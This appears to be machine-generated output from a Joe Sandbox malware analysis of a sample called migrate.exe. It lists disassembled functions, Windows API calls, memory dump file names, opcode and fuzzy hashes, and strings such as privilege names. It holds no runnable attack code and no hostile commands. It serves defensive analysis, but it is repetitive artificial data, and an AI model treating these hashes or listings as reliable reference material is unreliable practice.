                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                    • Opcode ID: 8191d205fe39ebe58390619d23ba352102f2a9873c3acaa91a7aa9962b7eb635
                                                                                                                                                                                                    • Instruction ID: c3fb3417ea744d5b8b57b605a9a0c2f531987f613a2c424be0b7b5f2287c65d7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8191d205fe39ebe58390619d23ba352102f2a9873c3acaa91a7aa9962b7eb635
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B701DFB66097117FA7211ABA5CCCC7B7A6DEEC7FA0B150129FA04C2210FF60CD0289B0
                                                                                                                                                                                                    Function 00139869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,001391AD,0013B188,?,00139813,00000001,00000364,?,001340EF,?,?,00151098), ref: 0013986E
                                                                                                                                                                                                    • _free.LIBCMT ref: 001398A3
                                                                                                                                                                                                    • _free.LIBCMT ref: 001398CA
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00151098), ref: 001398D7
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00151098), ref: 001398E0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                    • Opcode ID: 170baa0ff66681a44003a0741fb548598ddf17951cbd671ddc9ea4d2a3bc7427
                                                                                                                                                                                                    • Instruction ID: 42f46f0df4d51740b1f49782b876b9e8be5ffb3f46d564d968e7ded1c96ce958
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 170baa0ff66681a44003a0741fb548598ddf17951cbd671ddc9ea4d2a3bc7427
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A201F47A1486096BD31627647C9591B2979DFE3771F310174F515A21A2FFB0CC015261
                                                                                                                                                                                                    Function 00120EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 001211CF: ResetEvent.KERNEL32(?), ref: 001211E1
                                                                                                                                                                                                      • Part of subcall function 001211CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001211F5
                                                                                                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00120F21
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00120F3B
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00120F54
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00120F60
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00120F6C
                                                                                                                                                                                                      • Part of subcall function 00120FE4: WaitForSingleObject.KERNEL32(?,000000FF,00121101,?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FEA
                                                                                                                                                                                                      • Part of subcall function 00120FE4: GetLastError.KERNEL32(?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FF6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1868215902-0
                                                                                                                                                                                                    • Opcode ID: a1bb0d29717ed2469efd2c617d6c4cc6de2c68c55f50fcd871f64d5b9753da69
                                                                                                                                                                                                    • Instruction ID: 62152260cb68ce6c3c2a1301aaa70749e85d70a0b8f32ad02db09b016a89e642
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1bb0d29717ed2469efd2c617d6c4cc6de2c68c55f50fcd871f64d5b9753da69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E019E76000740EFC7329B64ED84BC6BBAAFB08710F000A29F26A92560CB727A94CB50
                                                                                                                                                                                                    Function 0013C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C817
                                                                                                                                                                                                      • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
                                                                                                                                                                                                      • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C829
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C83B
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C84D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C85F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: 693f6534b9641f89b18f29bc1675f773dbf40c94a17147b941a45ee768f1a14a
                                                                                                                                                                                                    • Instruction ID: a7a7626a63a1c89d862b79211de02d85ba3472fe35502af1d5c3fd6a0bdbea33
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 693f6534b9641f89b18f29bc1675f773dbf40c94a17147b941a45ee768f1a14a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F01232504201ABCA20EBA9F885C1673F9BB11B24F541859F108F7962CB71FD80CB94
                                                                                                                                                                                                    Function 00121FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00121FE5
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00121FF6
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00122006
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00122014
                                                                                                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0011B371,?,?,00000000,?,?,?), ref: 0012202F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3397213944-0
                                                                                                                                                                                                    • Opcode ID: 373adfcbc21e1ba3af74571ba31788f6fd162293bbd14457d20470cf985b187f
                                                                                                                                                                                                    • Instruction ID: 6d33663f8d7d7f711a297fdc155d9d8c5bcebe8c9979c0e0df64fd216063bb9f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 373adfcbc21e1ba3af74571ba31788f6fd162293bbd14457d20470cf985b187f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF01D32408024BBCF266F51EC09DCE7F26EB55760F218415F62A5B061CB7296A1D694
                                                                                                                                                                                                    Function 00138900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013891E
                                                                                                                                                                                                      • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
                                                                                                                                                                                                      • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138930
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138943
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138954
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138965
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: 176eb105ddbf4f3f18c333686fd41c3634fa89bdff7554cbf69ae0793696f267
                                                                                                                                                                                                    • Instruction ID: 46d0773a90d7a249aed845c3a5863d818a0b973e8a6514a5f860c893dee2094d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 176eb105ddbf4f3f18c333686fd41c3634fa89bdff7554cbf69ae0793696f267
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0F8758503269BCE46BF64FC024193FF1F735B24B010646F91CA6AB2CB7189C2DB81
                                                                                                                                                                                                    Function 001215FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _swprintf
                                                                                                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                                                                                                    • Opcode ID: 52c48ff2061aa9879653210181ead6f6ad9998bed737977fb366d007feef8d0c
                                                                                                                                                                                                    • Instruction ID: 82b987da3a32ce5e09520c28ce4faf07eb45f1c3635da2170ab7b70baca3c9dc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52c48ff2061aa9879653210181ead6f6ad9998bed737977fb366d007feef8d0c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56515B31288330F6F62D9B90BC86F797265BB34B00F254506F786744E1E7E2A570E71A
                                                                                                                                                                                                    Function 00137F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,c:\programdata\migrate.exe,00000104), ref: 00137FAE
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138079
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138083
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                    • String ID: c:\programdata\migrate.exe
                                                                                                                                                                                                    • API String ID: 2506810119-2960915705
                                                                                                                                                                                                    • Opcode ID: 79bf8ad341c615f328e31715cd29b70c16e905f629db797d4997f56fb0aad3b9
                                                                                                                                                                                                    • Instruction ID: 7cba676ab2684e670d52fadbbcc86b066fc93689d469a5ad531fd78163970964
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79bf8ad341c615f328e31715cd29b70c16e905f629db797d4997f56fb0aad3b9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0331A0B1A04318AFDB25DF99D881D9EBBFCEF95310F104066F90897211DBB08E85CB61
                                                                                                                                                                                                    Function 001331D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001331FB
                                                                                                                                                                                                    • _abort.LIBCMT ref: 00133306
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                                                                                                    • Opcode ID: 44b9d826d7a8b8fa34e5ecff13b88d76405de0b76a53e90bb66fa70dd872a9db
                                                                                                                                                                                                    • Instruction ID: 8f85618f990e4d24c55720c83d17ea4e81e2b9f87f908645877e69a4f8639b0c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44b9d826d7a8b8fa34e5ecff13b88d76405de0b76a53e90bb66fa70dd872a9db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56416971900209AFCF16DF98CD81AEEBBB5FF48304F188099F919A7221D335EA50DB54
                                                                                                                                                                                                    Function 00117401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00117406
                                                                                                                                                                                                      • Part of subcall function 00113BBA: __EH_prolog.LIBCMT ref: 00113BBF
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 001174CD
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetLastError.KERNEL32 ref: 00117AF1
                                                                                                                                                                                                      • Part of subcall function 00117A9C: CloseHandle.KERNEL32(?), ref: 00117B00
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                                                                                                    • Opcode ID: d27716b4439f520e130ceecd54796c278d3976c71fdcc41d53063891ea522782
                                                                                                                                                                                                    • Instruction ID: d9abe3af1c614b6e6b76b055068bfaf7d768e4a53952483f290c80198f8c9d29
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d27716b4439f520e130ceecd54796c278d3976c71fdcc41d53063891ea522782
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17310571D04258BADF16EBA4DC45BEEBBB9AF29300F044025F454A72D2D7748AC4C760
                                                                                                                                                                                                    Function 0012AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0012AD98
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0012ADAD
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0012ADC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                                                                                                    • Opcode ID: c8894714138e51f93a98cb0fcc215e4cf6457cdc72e485fe4f376ec6425ffde4
                                                                                                                                                                                                    • Instruction ID: a66cc41dfc01669b91c317f4f01536b6664a3a4960e60e13e3e153b6eba694fd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8894714138e51f93a98cb0fcc215e4cf6457cdc72e485fe4f376ec6425ffde4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D11E932280224BFD7268FECFD05FAA7779FF5A742F800414F244D78A0C7619995A722
                                                                                                                                                                                                    Function 0011D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fprintf_l.LIBCMT ref: 0011D954
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 0011D99A
                                                                                                                                                                                                      • Part of subcall function 00121DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00151030,?,0011D928,00000000,?,00000050,00151030), ref: 00121DC4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                                                    • String ID: $%s$@%s
                                                                                                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                                                                                                    • Opcode ID: 8ff140baa4cbc094dc15175770df1d01be86495db8283667c9347ed9aff32cca
                                                                                                                                                                                                    • Instruction ID: dd0165f3f497c6996e0999fb3faf6944a3cb85e623c5e547f30075b728e7a466
